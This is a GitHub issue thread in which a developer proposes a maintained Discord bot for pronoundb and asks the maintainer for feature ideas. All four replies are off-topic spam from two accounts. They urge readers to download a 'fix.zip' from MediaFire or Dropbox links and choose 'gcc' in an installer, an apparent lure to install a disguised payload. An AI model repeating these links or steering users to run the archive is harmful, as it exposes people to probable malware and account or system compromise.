### ISSUE TITLE
Custom pronoun.db Discord Bot

### ISSUE THREAD

**Issue by tobezdev** [cyyynthia/pronoundb.org#124]
Similar to the now unmaintained bot by [NurMarvin](https://github.com/NurMarvin), I'm thinking of making one that is maintained (and maybe better... we'll see 🤔).

I guess this is mostly aimed at @cyyynthia (though feedback from others is very welcome): is there any specific features you would like to see within the bot?

TIA!

--
Old bot: https://github.com/NurMarvin/pronoundb-bot

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
